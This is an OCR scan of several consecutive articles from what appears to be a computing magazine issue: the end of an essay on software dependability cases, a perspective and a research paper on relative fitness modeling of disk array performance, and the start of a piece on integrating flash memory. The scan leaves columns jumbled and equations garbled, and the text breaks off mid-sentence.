flight-control software.’ 


| statistical evidence that the absence of | 


Until these approaches are more 
widely adopted, many development 
teams will choose to rely instead on 


manual code review. In any case, it is 


important to realize that arguments 
that are not mechanically checked are 
likely to be flawed, so their credibility 


must suffer and confidence in any de- | 


pendability claims that rely on them 
must be reduced accordingly. 

The credibility of tools. Tools are 
enormously valuable, but the glamour 
of automation can sometimes over- 
whelm our better judgment. A symp- 
tom of this is our tendency to invest 
terms used to describe tools with more 
significance than their simple mean- 
ing. For example, inventors of program 
analyses have long classified their 


_ creations as “sound” or “unsound.” A 


sound analysis establishes a property 
with perfect reliability. That is, if the 
analysis does not report a bug, then 
there is no possible execution that can 


violate the property. This notion help- | 


fully distinguishes verifiers from bug 
finders—a class of tools that are very 
effective at catching defects, especially 
in low-quality software, but that usually 
cannot contribute evidence of depend- 
ability because they tend to be heuris- 
tic and therefore unsound. 

But the assumption that sound tools 
are inherently more credible is danger- 
ous. Alex Aiken found that an unsound 
tool uncovered errors in a codebase 
that a prior analysis, using a sound tool, 


had failed to catch. The much higher — 
volume of false alarms produced by | 


the sound tool overwhelmed its users 
and made the real defects harder to 
identify.' In recent years, developers of 
analysis tools have come to realize that 
the inclusion of false positives is just 
as problematic as the exclusion of true 
positives and that more sophisticated 
measures are needed. 

Even if an analysis establishes a 
property with complete assurance, the 
question of whether the property itself 
is sufficient still remains. For example, 
eliminating arithmetic overflows and 
array bounds errors from a program is 
certainly progress. But knowing that 
such faults are absent may not help 
the dependability case unless there is 
either: a chain of reasoning connect- 
ing this knowledge to assertions about 
end-to-end properties; or some strong 
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these faults is correlated with the ab- 
sence of other faults. 

Among analysis tools, mathematical 
proof is generally believed to offer the 
highest level of confidence. An analysis 
substantiated with a proof can be cer- 
tified independently by examining the 
proof in isolation, thereby mitigating 
the concern that the tool that produced 


_ the proof might have been faulty. 


Proof is not foolproof, however. 
When a bug was reported in his own 
code (part of the Sun Java library), Josh- 
ua Bloch found’ that the binary search 
algorithm—proved correct many years 
before (by, amongst others Jon Bentley 
in his Communications column) and 


| upon which a generation of program- 


mers had relied—harbored a subtle 
flaw. The problem arose when the sum 
of the low and high bounds exceeded 
the largest representable integer. Of 
course, the proof wasn’t wrong inatech- 
nical sense; there was an assumption 
that no integer overflow would occur 
(which was reasonable when Bentley 
wrote his column, given that comput- 
er memories back then were not large 
enough to hold such a large array). In 
practice, however, such assumptions 
will always pose a risk, as they are often 
hidden in the very tools we use to rea- 
son about systems and we may not be 
aware of them until they are exposed. 


Closing Thoughts 

The central message of this article is that 
itis not rational to believe that a software 
system is dependable without good rea- 
son. Thus any approach that promises 
to develop dependable software must 
provide such reason. A clear and explicit 
articulation is needed of what “depend- 
able” means for the system at hand, and 
an argument must be made that takes 
into account not only the correctness of 
the code but also the behavior of all the 
other components of the system, includ- 
ing human operators. 

Is this approach practical? The cost 
of constructing a dependability case, 
after all, may be high. On the other 
hand, such construction should focus 
resources, from the very start of the 
development, where they bring the 
greatest return, and the effort invested 
in obtaining a decoupled design may 
reduce the cost of maintenance later. 
The experience of Praxis shows that 
many of the approaches that the indus- 
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try regards as too costly (such as for- 
mal specification and static analysis of 
code) can actually reduce overall cost.” 

Similarly, even though the augmen- 
tation of testing with more ambitious 
analysis tools will require greater ex- 
pertise than is available to many teams 
today, this avenue does not necessarily 
increase the cost either. When low lev- 
els of confidence suffice, testing may be 
the most cost-effective way to establish 
dependability. As the required level of 
confidence rises, though, testing soon 
becomes prohibitively expensive, and 
the use of more sophisticated methods 
is likely to be more economical. Invari- 
ants may be harder to write than test 
cases, but a single invariant defines an 
infinite number of test cases, so a de- 
cision to write one (and use a tool that 
checks all the cases it defines) will pay 
off very soon. 

Efforts to make software more de- 
pendable or secure are inherently con- 
servative and therefore risk retarding 
progress, and many practitioners under- 
standably see certification schemes and 
standards as millstones around their 
necks. But because a direct approach 
based on dependability cases gives de- 
velopers an incentive to use whatever 
development methods and tools are 
most economic and effective, the ap- 
proach therefore rewards innovation. 
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Disk Array Models for Automating 
Storage Management 


By Arif Merchant 


LARGE DISK ARRAYS are everywhere, 
even if we, as end users of computer 
services, rarely notice them. When we 
shop at an Internet retailer, the prod- 
uct and account data come from a disk 
array in a data center. Our email, bank- 
ing, payroll, insurance, and tax data all 
reside on disk arrays. The hardware 
used is typically diverse, obtained from 
multiple vendors at different times. 
Depending upon an application’s re- 
quirements for throughput, response 


time, availability, and reliability, its | 


data may be distributed across disk 
arrays and even across multiple data 
centers and made resilient to failures 
through replication or the addition of 
error correction codes. 


tremely complex, involving tasks such 
as initially placing the data, arranging 
for data backup, prioritizing dataaccess 
so that each application can receive the 
performance it requires, periodically 
migrating data from one disk array to 
another, monitoring performance, and 
diagnosing any performance problems 
found. Some partially automated tools 
can assist the operator, but in the end, 
storage management is a manually in- 
tensive process. As a result, manage- 


plifying implementation, rather than 
optimizing application performance. 


The key to reducing costs and im- | 
proving the performance and depend- | 


ability of storage is to automate the 
management tasks because comput- 


ers can keep track of complex envi- | 


ronments and intricate decisions bet- 
ter than human beings. However, the 
management system must understand 
the behavior of the storage system it 
manages. For example, when a new da- 
tabase server is to be installed, where 
should its data be placed? Would one 
of the existing disk arrays in the data 
center suffice, or is a new one needed? 


consider numerous options to make an 
informed decision, but it must be able 
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to predict the performance impact of 
each option. In other words, the man- 
agement system needs a model to an- 
swer the question “How will my appli- 
cations’ storage performance change if 
I take this option?” 

Building accurate performance 
models of storage systems has long 
been a stumbling block to designing 
automated storage management sys- 
tems, because one needs to be able to 
build models, quickly and easily, for 
the multitude of disk arrays in use, and 
for a wide variety of workloads. While 
models of basic disk drives for simple 
workloads are known, most data cen- 
ters use disk arrays, which are much 


| more complex because they aggregate 
Managing disk array storage is ex- | 


a number of disks with cache and con- 
trol firmware. Earlier disk array per- 
formance models either were hand- 
built for each disk array model and 
required extensive tuning for good ac- 
curacy, or were based on benchmark 
measurements of a few workloads on 
the device. In either case, the mod- 


els were only accurate for workloads | 


similar to those used to build the 
models. 
To address this problem, Michael 


| Mesnier, Matthew Wachs, Raja Samba- 
Pe . | 
ment decisions are geared toward sim- 


sivan, Alice Zheng, and Gregory Ganger 
have proposed a new approach, called 
relative fitness modeling. Rather than 
directly building a performance model 
for each disk array, the authors sug- 
gest it is easier to characterize the dif- 
ference in performance between disk 
arrays. These models, built by mea- 
suring the differences in performance 
between a given pair of arrays for a rep- 
resentative set of workloads, are shown 
empirically to apply to a larger set of 
workloads. Then, if we have a relative 
fitness model for the differences be- 
tween two arrays, and we know how a 


| given workload performs on the first 
| array, we can predict the performance 
Anautomated managementsystemcan | 


of the workload on the second. This 
scenario is common. For example, a 
user may have measured the average 
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I/O response time of an application on 
an existing array; if the disk array ven- 
dor can provide a relative fitness model 
of the differences between the user’s 
existing disk array and a newer one, the 
I/O response time of the application on 
the new array can be predicted. 

The relative fitness method is an 
important step in modeling the per- 
formance of disk arrays, but many 


| challenges persist. In particular, disk 


array models must be able to predict 


| accurately the performance of an ar- 


bitrary combination of workloads, 
given the increasing trend of storage 
consolidation in the data center (that 
is, storing multiple application data 
sets on the same disk array), and this 
problem remains open. The success 
of the relative fitness method gives 
us hope that similar techniques can 
be used to predict the performance of 
workload combinations; this is an ac- 
tive area of work for storage systems 
researchers. 
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Relative Fitness Modeling 


By Michael P. Mesnier, Matthew Wachs, Raja R. Sambasivan, Alice X. Zheng, and Gregory R. Ganger 


Abstract 
Relative fitness is a new approach to modeling the perfor- 


mance of storage devices (e.g., disks and RAID arrays). In | 


contrast to a conventional model, which predicts the per- 
formance of an application’s I/O on a given device, a relative 
fitness model predicts performance differences between 
devices. The result is significantly more accurate predictions. 


1, INTRODUCTION 


Relative fitness: the fitness of a genotype compared with 
another in the same gene system. 


Managing storage within a data center can be surprisingly 
complex and costly. Large data centers have numerous stor- 
age devices of varying capability, and one must decide which 
application data sets (e.g., database tables, web server con- 
tent) to store on which devices. Sadly, the state-of-the-art 
in Information Technology (IT) requires much of this to be 
done manually. At best, this results in an overworked system 
administrator. However, it can also lead to suboptimal per- 
formance and wasted resources. 

Many researchers believe that automated storage man- 
agement”’ is one way to offer some relief to administrators. 
In particular, application workloads can be automatically 
assigned to storage devices. Doing so requires accurate pre- 
dictions as to howa workload will perform on a given device, 
and a model of a storage device can be used to make these 
predictions. Specifically, one trains a model to predict the 
performance of a device as a function of the I/O characteris- 
tics of a given workload.'\”''* Common I/O characteristics 
include an application’s read/write ratio, I/O pattern (ran- 
dom or sequential), and I/O request size. 

Though it sounds simple, such modeling has not been 
realized in practice, primarily because of the difficulty of 
obtaining workload characteristics that are good predic- 
tors of performance, yet also suitable for use in a model. 
For example, the I/O request size of an application is often 
approximated with an average, as opposed to the actual dis- 
tribution (e.g., bimodal). Although such approximations 
reduce modeling complexity, they can lead to inaccurate 
predictions. 

This article describes a new modeling approach called 
relative fitness modeling. '° A relative fitness model uses obser- 
vations (performance and resource utilization) from one stor- 
age device to predict the performance of another, thereby 
reducing the dependence on workload characteristics. Figure 1 
illustrates relative fitness modeling for two hypothetical devices 
AandB. 

The insight behind relative fitness modeling is best 
obtained through analogy. When predicting your grade in 
a college course (a useful prediction during enrollment), 


it is helpful to know the grade received by a peer (his 
performance) and the number of hours he worked each 
week to achieve that grade (his resource utilization). 
Naturally, our own performance for a certain task is a com- 
plex function of the characteristics of the task and our abil- 
ity. However, we have learned to make predictions relative 
to the experiences of others with similar abilities, because 


| itis easier. 


Applying the analogy, two storage devices may behave 
similarly enough to be reasonable predictors for each other. 


| Forexample, they may have similar RAID levels, caching algo- 


rithms, or hardware platforms. As such, their performance 
may be related. Even dissimilar devices may be related in 
some ways (e.g., for a given workload type, one usually per- 
forms well and the other poorly). The objective of relative fit- 
ness modeling is to learn such relationships. 


2. BACKGROUND 

Storage performance modeling is a heavily researched area, 
including analytical models," statistical or probabilistic 
models,’ and machine learning models.'® '’ Models are 
either white-box or black-box. White-box models use knowl- 
edge of the internals of a storage device (e.g., drives, con- 
trollers, and caches), and black-box models do not. Given 
the complexity of modern-day storage devices,’* black-box 
approaches are becoming increasingly attractive. 


A LE OE ME TT MTL TT TE NT LE EIS, 
Figure 1: Using sample workloads, a model learns to predict how the 
performance of a workload changes between two devices (A and B). 

To predict the performance of a new workload on B, the workload 
characteristics, performance, and resource utilization (as measure on 
device A) are input into the model of B. The prediction is a performance 
scaling factor, which we refer to as B’s “relative fitness.” 


Step 1: Model differences between devices A and B 
Training “a, | Model learning Relative fitness 
data S 4 algorithm model of B 
Step 2: Use model to predict the performance of B 


A's workload characteristics 
a ~ ‘ae 
Relative fitness 
model of B 


B's relative 


A's performance —— i 
fitness 


A's resource utilization — 


A previous version of this research paper was published in 
the Proceedings of the International Conference on Measure- 
ment and Modeling of Computer Systems (San Diego, CA, 
June 2007), ACM, NY. 
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Perhaps the simplest of all black-box models is a numeric 
average. For example, the fuel efficiency of a car (average 
miles per gallon) and a soccer player’s performance (aver- 
age goals per game) are both black-box models. Of course, 
such models can be easily extended with workload charac- 
teristics (e.g., highway or city, home game or away), and an 
average can be maintained for each type of workload. 

Table 1 shows a simple black-box model of a storage device 
(a table of performance averages), and Figure 2 shows the same 
information ina regression tree.’ Both models are indexed using 
one workload characteristic (the average request size of the I/O 
that is issued to the storage device by the application), and both 
models must be trained with sample workloads in order to learn 
performance averages for various request sizes. Some form of 
interpolation is required when an exact match is not found in 
the model. For example, to predict the performance of a work- 
load with 3KB requests, using Table 1, one might average the 2 
and 4KB performance and predict 37MB/s. Of course, storage 
researchers have explored a number of workload characteristics 
in addition to request size, including the read/write ratio, mul- 
tiprogramming level (queue depth), I/O inter-arrival delay, and | 
spatial locality. More complex characteristics (e.g., I/O bursti- | 
ness, spatio-temporal correlation) have also been investigated. 

More formally, a model of a storage device i (white-box or 
black-box) can be expressed as a function F,. During train- 
ing, the inputs are the workload characteristics WC, of an | 


TL Re SRR SE ARORA | RE PA AE PSOE SE 
Table 1: A table-based model that records the performance of a disk 
drive for sequentially-read data. 


Request Size Bandwidth | 
1KB 15MB/s | 
2KB 27MB/s 
4KB 47MB/s 
8KB 66 MB/s 


Figure 2: A regression tree that learns the performance of a disk 
drive for sequentially read data. 
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Request size Request size 
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application running on device 7 and the output is a perfor- 
mance metric P, (bandwidth, throughput, or latency): 


P.=F, (WC). (1) 


_ We refer to Equation 1 as an absolute model, to signify that the 


inputs WC, are absolute, and not relative to some other device. 
However, in practice, one does not possess WC, , as this would 
require running the workload on device 7 in order to obtain 
them. Because running the workload to obtain WC, obvi- 
ates the need for predicting the performance of device i, one 


_ instead uses the characteristics WC obtained from some other 


storage device j. That is, the model assumes that the character- 
istics of a workload are static and will not differ across storage 
devices. More precisely, the model assumes that WC, and WC, 
are equivalent. However, this is not always a safe assumption. 


2.1. The challenges with absolute models 

The primary challenges with absolute models relate to work- 
load characterization, which has been an open problem for 
decades." First, one must discover the performance-affecting 
characteristics of a workload. This can be challenging given 


| the heterogeneity of storage devices.* For example, a storage 


array with a large cache may be less sensitive to the spatial 
access pattern than an array with little cache, so models of 
the devices would likely focus on different workload charac- 
teristics when predicting performance. 

Second, one must manage the trade-off between expres- 
siveness and conciseness. Most models expect numbers as 
input, and it can be challenging to describe complex work- 
loads with just a few numbers. In effect, workload character- 
ization compresses the I/O stream to justa few distinguishing 
features. The challenge is to compress the stream without 
losing too much information. 

Third, and more fundamentally, an absolute model does 
not capture the connection between a workload and the stor- 
age device on which it executes. While the assumption of static 
workload characteristics (i.e., WC, = WC)) is safe for open work- 
loads, where the workload characteristics are independent 


of the I/O service time, it is not safe for closed workloads. The 


most obvious change for a closed workload is the I/O arrival 
rate: if a storage device completes the I/O faster, then an appli- 
cation is likely to issue I/O faster. And other characteristics can 
change, such as the average request size, access pattern, read/ 


| write ratio, and queue depth. Such effects occur when file sys- 


tems, page caches, and other OS middleware reside between 
an application and the storage device. Although the applica- 
tion may issue the same I/O, the characteristics of the I/O as 
seen by the storage device could change due to write reorder- 
ing, aggregation and coalescing, caching, prefetching, and 
other interactions between an operating system and a storage 
device. For example, a slower device can result in a workload 
with larger inter-arrival times and larger write requests (due to 
request coalescing) when compared to a faster device. 
Collectively, these challenges motivate the work pre- 
sented in this article. Rather than attempt to solve the diffi- 
cult problem of identifying workload characteristics that are 
expressive, yet concise and static across devices, we choose 
to use performance and resource utilization. That is, we use 


the performance and utilization of device j to predict the 
performance of a different device i. Of course, such relative 
models must be built between each pair of devices, as per- 
formance and resource utilization are device-specific. 


3. RELATIVE FITNESS MODELING 

Relative fitness begins with an absolute model (Equation 1). 
Recall that a workload is running on device /, WC, can be mea- 
sured on device j, and we want to predict the performance of 
moving the workload to a different device i. The first objective 
of relative fitness is to capture the changes in workload charac- 
teristics from device to i, that is, to predict WC, given WC,.Such 
change is dependent on the devices, so we define a function G., 
that predicts the workload characteristics of device i given /: 


WC,=G 


joi 


(wo). 
We can now apply G in the context of an absolute model F: 


P.=F(G, 


joi 


(WC))). 


However, rather than learn two functions, the composition 
of F and G can be expressed as a single composite function 
RM,_,, which we call a relative model: 

P,=RM, ,,(WC)). (2) 
With each model now involving an origin j and target 7, we 
can use the performance of device j (Perf) and its resource 
utilization (Util,) to help predict the performance of device i. 
Perf is a vector of performance metrics such as bandwidth, 


the device’s cache utilization, the hit/miss ratio, its network 
bandwidth, and its CPU utilization: 

P,=RM, ,; (WC, Perf, Util). (3) 
In other words, one can now describe a workload relative 
to some other device. Recalling the analogy, if you want to 
predict your grade in a course that a colleague has already 
taken, you could simply have the colleague tell you his grade 
and the number of hours he worked each week. Other details 
of the course (workload characteristics) could be useful, but 
this information may not be as critical. 

Next, rather than pass performance P,, one can predict 
the performance ratio + B , which may be a simpler function 
to model (e.g., perhaps device i is twice as fast as device j). 
We call such a model a relative fitness model: 


P 
Pp 


J 


=RF (WC, Perf, , Util,). 


Joi 


(4) 
To use the relative fitness model, one solves for Pi: 


P,=RF,_,,(WC,, Perf, Util,) x 

3.1. Model training 

Training a relative fitness model requires workload sam- 
ples from two devices i andj. Each workload sample can be 
described with three vectors: workload characteristics (WC), 


performance (Perf), and resource utilization (Util). During 
training, the goal is to learn relationships between the pre- 
dictor variables (WC,, Perf, and Util ) and the predicted rela- 
tive fitness value = (for some Pin Perf). 

Table 2(c) shows the format of the training data fora rela- 
tive fitness model. For comparison, Table 2(b) shows that of 
a relative model which trains to predict performance (not a 
ratio), and Table 2(a) shows that of an absolute model which 
only requires samples from one storage device. 

Given sufficient training data, one can construct a rela- 
tive fitness model using a variety of learning algorithms. The 
problem falls under the general scope of supervised learning, 
where one has access to a set of predictor variables (WC, Perf, 


| and Util), as well as the desired response (the relative fitness 
| value). It is as though an oracle (or supervisor) gives the true 


output value for each sample, and the algorithms need only 
learn the mapping between input and output. 

The domain of supervised learning problems can be 
further subdivided into classification (discrete-valued pre- 


| dictions) and regression (continuous-valued predictions). 
_ Relative fitness values are continuous, and there are many 


regression models in statistical literature. We choose to use 
classification and regression tree (CART) models, for their 
simplicity, flexibility, and interpretability.’ 


3.2. Summary and modeling cost 

Whereas conventional absolute modeling constructs one 
model per device and assumes that the workload character- 
istics are static across devices, relative fitness modeling con- 
structs two models for each pair of devices (i > j andj > 1) 


| andimplicitly models the changing workload characteristics. 
throughput, and latency. Util, i is a vector of values such as | 


In addition, the relative approaches use performance and 
resource utilization when making predictions, thereby relax- 
ing the dependency on expressive workload characteristics. 
Of course, the cost of the relative approach is the additional 
model construction: O(n?) versus O(1), where n is the number 
of storage devices. However, in our evaluation, model construc- 
tion takes at most a few seconds. Moreover, models can be built 
and maintained by each storage device. That is, each device can 


Table 2: Training data formats for the various models. The last 
column in each table is the variable that we train a model to predict. 
All other columns are predictor variables. 


Sample Predictor Variables Predicted Variables 
(a) Absolute model 
if WC , P; 4 
2 WC. , Pix 
N Wc, ae 
(b) Relative model 
1 WC, , Perf, , Util, ; Pia 
2 WC, , Perf, , Util; , Pra 
N WC, ,, Perf, ,, Util, , P. 
(c) Relative fitness model 
it WC, , Perf, , Util, ; : Pia 
2 WC, , Perf, , Util, , Pi o/P i> 
N WC, ,, Perf, , Util, , Pi lPin 
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construct O(1) models that predict its fitness relative to allother | 
devices. As such, the computational resources for maintaining 
the models can be made to scale with the number of devices. 
Also, in large-scale environments, certain collections of devices 
will be identical and can share models. 


4. EVALUATION 
The motivation and advantages of relative fitness modeling 
can be stated as four hypotheses: 


Hypothesis 1. Workload characteristics can change across 
storage devices (WC, # wc) and reduce the accuracy of 
an absolute model. 

Hypothesis 2. A relative model (Equation 2) can reduce the 
inaccuracies that result from changing characteristics. 

Hypothesis 3. Performance and resource utilization can 
improve prediction accuracy (Equation 3). 

Hypothesis 4. Performance ratios (Equation 4) can pro- 
vide better accuracy than raw performance values 
(Equation 3). 


To test these hypotheses, the accuracy of various CART 
models can be compared: absolute models (Equation 1), rel- 
ative models (Equation 2), relative models with performance 
(Equation 3), and relative fitness models (Equation 4). 


4.1. Setup 

Experiments are run on an IBM x345 server (dual 2.66GHz 
Xeon, 1.5GB RAM, GbE, Linux 2.6.12) attached to three iSCSI | 
storage arrays. The arrays have different hardware plat- 
forms, software stacks, and are configured with different 
RAID levels.? More specifically, 


Vendor A is a 14-disk RAID-50 array with 1GB of cache 
(400GB 7200 RPM Hitachi Deskstar SATA) 

Vendor B is a 6-disk RAID-0 array with 512MB of cache 
(250GB 7200 RPM Seagate Barracuda SATA) 

Vendor C is an 8-disk RAID-10 array with 512MB of cache 
(250GB 7200 RPM Seagate Barracuda SATA) 


The server attaches to each array using an iSCSI device 
driver’ that contains counters (below the file system and page 
cache) for characterizing workloads and measuring their 
performance. A synthetic workload generator’ is used to gener- _ 
ate numerous workload samples, which we refer to as a fitness 
test. These samples are used to train and test the CART models. 
Similar results from other workloads (e.g., Postmark, TPC-C), 
as well as details on the CART algorithm (e.g., tree construction 
and pruning), can be found in our conference paper."” 


4.2. Fitness test results 

The fitness test compares the performance of the storage 
arrays across a wide range of workloads (various runs of the 
workload generator). The measured workload characteristics 
(WC) of each sample include the write percent, the write and 


“ RAID level 0 is striping, 1 is mirroring, 5 is striping with parity, 10 is strip- 
ing over mirrored pairs (4 in this case), and 50 is striping over RAID-5 parity 
arrays (2 in this case). 
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read request sizes, the write and read randomness (average 
seek distance, in blocks, per I/O), and the queue depth (aver- 
age number of outstanding I/Os). The performance (Perf) of 
each sample run is the average bandwidth (MB/s), through- 


| put (IO/s), and latency (ms). Resource utilization (Util) is not 


used in this evaluation, as this requires modifying storage 


_ device software to which we did not have access. A total of 


3000 samples are generated. 

Over all 3000 samples, Vendor A is the fastest array with 
an average bandwidth of 25 MB/s, an average throughput 
of 624 1O/s and an average latency of 37ms. Vendor B is the 
second fastest (17 MB/s, 349 IO/s, and 45ms). Vendor C is 
the third (14 MB/s, 341 IO/s, and 84ms). Although Vendor A 
is the fastest, on average, it is not necessarily the fastest for 
all sample workloads in the fitness test. There are samples 


| where Vendors B and C do better than A (relative fitness val- 


ues greater than 1) and cases where they do worse (values 
lesser than 1). In short, the relative fitness of a device can vary 
with the workload characteristics. 

Asanexample of how devices can behave similarly, Figure 3 
illustrates how the sequential write bandwidth for each array 
varies for different request sizes and queue depths. From the 
3000 samples, we show only the sequential write workloads. 
There are 120 such samples, sorted by the performance of 
Vendor A. The graph illustrates the similar performance of 
the arrays. In particular, the prominent discontinuity in the 
graph is shared by all arrays (a drop in performance when 
there are only one or two outstanding requests). Also note 
how Vendor Bis faster than Vendor C to the left of the discon- 
tinuity, but slower to the right. Such piecewise functions are 
ideally suited for CART models. 

In support of Hypothesis 1, Table 3 contains averages for 
the workload characteristics of each sample. Note the vari- 
ance across devices (WC,#WC,), most notably the average spatial 
randomness of writes, which varies by as much as 38%. In par- 
ticular, Vendor A experiences the most randomness (an average 
seek distance of 321MB per write), Vendor B the second most 
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Figure 3: Device similarity. The performance of each array changes 
similarly, indicating that the performance of one array is a good 
predictor of another. 
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(250MB), and Vendor C the third (233MB). Although masked by 
the averages in Table 3, the request sizes and queue depths also 
vary across storage devices for some of the sample workloads. 


4.3. Interpreting the models 
Of the fitness test samples, 75% are used to build the CART 


models and 25% are reserved for testing. Figure 4 illustrates 


four of the bandwidth models, one of each modeling type. 
For readability, each tree is pruned to a depth of 4, resulting 
in at most 8 leaves (prediction rules). 

The models in Figure 4 predict the performance of Vendor 
C given observations from Vendor A. CART builds trees top- 
down, so nodes near the top of the tree have the most informa- 
tion. In particular, note how the relative and relative fitness 
models learn that the bandwidth of Vendor A is the best pre- 
dictor of the bandwidth of Vendor C. 

As an example of how to use the trees to make a prediction, 
suppose a workload is running on Vendor A and we want to 
predict its performance on Vendor C. Also suppose that the 
workload, as measured by Vendor A, has an average read seek 
of 2048 blocks, a request size of 64KB, a write percentage 
<0.5%, a bandwidth of 83 MB/s, anda throughput of 1328 IO/s. 
The absolute model will predict 75.0 MB/s (see highlighted 
path in Figure 4a), the relative model (Figure 4b) predicts 
75 MB/s, the relative model trained with performance (Figure 
4c) predicts 65.0 MB/s, and the relative fitness model (Figure 
4d) predicts that Vendor C is 63% of Vendor A or 51 MB/s. 


4.4. Modeling accuracy 

Recall that 25% of the fitness test samples are reserved for 
testing, so the performance of each sample is known and can 
be used to determine the relative error of each prediction. 


Table 3: Fitness test workload characteristics. 


Resta Maximum 
wc A B c Difference (%) 
Write percent 40 39 38 5.2 
Write size (KB) 61 61 61 0 
Read size (KB) 40 4l 41 25 
Write seek (MB) 321 250 233 38 
Read seek (MB) 710 real 711 0 
Queue depth 23 22 21 9.5 


For example, if the performance of Vendor C (for a given test 
sample) is 45MB/s and the prediction is 51MB/s, the relative 
error is Lo x 100, or 13.3%. To quantify the average error 
of each model (over all test samples), we report the average 
relative error of the predictions. 

Asa baseline, Table 4 contains the average relative error of 
the bandwidth, throughput, and latency predictions for the 
absolute model. The table is organized pairwise. Workload 
characteristics (WC) are obtained from one array and pre- 
dictions (P,) are made for another. For example, the average 
relative error of the bandwidth predictions when character- 
izing on Vendor A and predicting for Vendor C is 22% (the 
top right cell in Table 4). 

The first observation is that the most accurate predic- 
tions occur when the workload is characterized on the same 
device for which the prediction is being made (WC, = WC), 
as indicated by the diagonals in bold. However, if one runs a 
workload on device i to obtain WC,, there is no need to make 
a prediction. These predictions are only included to illus- 
trate how changing workload characteristics (WC. #WC,) can 
affect prediction accuracy. For example, the bandwidth pre- 
diction error for Vendor A increases from 23% (when charac- 
terized on Vendor A) to 29% (when characterized on Vendor 
B) and 30% (when characterized on Vendor C). Therefore, 


| Table 4 supports Hypothesis 1: changing workload charac- 


teristics can affect prediction accuracy. 
Figure 5, in contrast, shows the prediction errors for 
the relative model (Equation 3) and relative fitness model 


Table 4: Prediction error for the absolute model. Workload 
characteristics (WC) are obtained from array j and predictions 


| (P,) are made for array i. 


Bandwidth, (%) Bandwidth, (%) Bandwidth, (%) 
WC 23 25 22 
WC 29 19 21 
WC 30 25 17 
Throughput, (%) Throughput, (%) Throughput, (%) 
WC, 20 23 22 
WC, 28 15 21 
WC, 26 21 14 
Latency, (%) Latency, (%) Latency, (%) 
WC, 20 39 59 
WC, 31 21 52 
WC, 26 30 21 
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Figure 4: CART models trained to predict the bandwidth of Vendor C. The leaf nodes in the absolute and relative models represent bandwidth 
predictions; the leaves in the relative fitness model are relative fitness predictions. The absolute model (a) and relative model (b) only use 
workload characteristics from Vendor A; the relative model (c) with Perf. and relative fitness model (d) also use Vendor A’s performance 
(shaded). All but the absolute model account for changes in the workload characteristics between Vendors A and C. 
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Figure 5: Errors of the absolute (first bar in each graph), relative (second), and relative fitness models (third), where i—j indicates that 
workload characteristics from array j are used to predict the performance of array i. 


A>B A>C BOA 
Array pair 


B>C C>A C->B A>B ARC 


(Equation 4), both of which use performance information to 
make a prediction; the absolute model prediction errors from 
Table 4 are shown for comparison. Overall, the relative fit- 
ness models reduce the average bandwidth prediction error 
from 25% to 17%, throughput from 24% to 19%, and latency 
from 40% to 29%. Moreover, in most cases, the relative fit- 
ness model is slightly more accurate than the relative model. 
These results confirm that models trained with performance 
can be more accurate (Hypotheses 2 and 3) and that predict- 
ing ratios can further improve accuracy (Hypothesis 4). 

In summary, workload characteristics can change 
across devices and impact the accuracy of an absolute 
model (Hypothesis 1), a relative model can reduce the 
inaccuracy due to changing workloads (Hypothesis 2), 
the performance of one device can be used to predict the 
performance of another (Hypothesis 3), and performance 
ratios can be better predictors than raw performance val- 
ues (Hypothesis 4). 


5. CONCLUSION 

By modeling storage devices relative to one another, rela- 
tive fitness models can use the observed performance and 
resource utilization of a workload on one device when 
making predictions for another. Such modeling addresses | 
many of the challenges associated with workload charac- 


agement a step closer to becoming a practical solution for 


BoA BoC CA CB 
Array pair 


terization and, therefore, brings automated storage man- 


the data center. 

In addition, relative fitness models may find a broader 
applicability outside of storage management. In the same 
manner that storage models can exploit performance and 
resource utilization, so too can models of other data center 
resources (e.g., application servers). 
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Integrating Flash Devices 


By Goetz Graefe 


FLASH MEMORY NOWADAYS Seems to be in | 


every discussion about system archi- 


tecture—not only in mobile devices | 


from phones to notebook computers, 
but also in servers, from Web servers 
to blades and database systems. Sure 
enough, flash memory boasts multiple 
qualities and advantages over tradition- 
al mass storage, disk drives with rotat- 
ing platters and moving access arms. 
These include no noise or vibration, 


lower power consumption and cool- | 


ing requirements during both active 


and idle times, faster access times, and | 


lower cost when calculated with a focus 
on access performance rather than on 
capacity. For example, a “flash disk” de- 
vice providing a standard interface and 
form factor of traditional SATA disk may 
cost five times more than a traditional 
SATA disk, but if it permits 100 times 
more read operations per second, the 
cost for access performance is 20 times 
less. Similarly, flash memory devices of- 
fer tremendous advantages over tradi- 
tional disk drives in terms of power and 
energy relative to access performance. 
On the other hand, flash memory still 
suffers from two principal weaknesses: 
reliability and cost relative to capacity. 
Thus, a system architect is tempted to 
combine traditional RAM and _ tradi- 
tional disk drives with flash memory. 
The RAM provides write endurance by 
absorbing the data traffic coming from 
the CPU caches; omitting RAM in a sys- 
tem architecture and backing up CPU 
caches with flash memory would lead 
to very unreliable or expensive comput- 
ing systems. The traditional disk drives 
provide cost-efficient storage capacity; 
many studies have shown that a large 
fraction of any data collection is rarely 
accessed after a short initial period of 
creation and repeated activity. In fact, 
disk hardware could be divided into 
capacity-optimized drives, often tar- 
geted at consumers, and performance- 
optimized drives, often targeted at en- 
terprises. Multi-disk strategies could be 
similarly divided, with RAID-5 and -6 op- 


timized for minimal overhead, minimal | 
power, and maximal capacity and with | 


RAID-1 optimized for performance. 

In discussions and designs, flash 
memory is placed between RAM and 
disks. Thus, the traditional two-level 
memory hierarchy (ignoring CPU cach- 
es and archival tapes) becomes a three- 
level hierarchy. For most applications, 
rewriting the source code to accommo- 
date a deeper memory hierarchy does 
not make sense. Thus, the flash memory 
must be integrated in such a way that its 
presence is hidden except for the perfor- 
mance or cost advantage. One exception 
may be database management systems, 
which manage very large data volumes 
and are thus constantly being updated 
to take the best advantage of available 
hardware. For example, researchers and 
vendors are investigating challenges 


/ and opportunities due to deep CPU 


caches, many-core processors, transac- 
tional memory, and flash memory. 
Roberts, Kgil, and Mudge represent a 
perspective that assumes no change in 
application software, meaning all adap- 


| tations for deep memory hierarchy and 


for flash memory are in the lower levels 
of system software. Multiple interesting 
and promising techniques are explored, 
for example, increasing reliability of 


multi-level flash memory by using indi- | 


vidual pages in single-level mode rather 
than immediately declaring them bad 
blocks. This novel technique for graceful 


| degradation of flash memory capacity, 


if widely adopted in future implementa- 
tions of the flash translation layer, could 


greatly increase reliability and cost effec- 


tiveness, and speed the adoption of flash 
memory in all kinds of servers. The race 
is on among techniques that give flash 
memory the required reliability and en- 


durance—candidates include over-pro- | 


visioning, hardware techniques such as 
those presented here, and software tech- 
niques such as a flash translation layer 
akin to a log-structured file system. 

The authors introduce and compare 
three basic architectures of using flash 


memory in the memory hierarchy: as | 


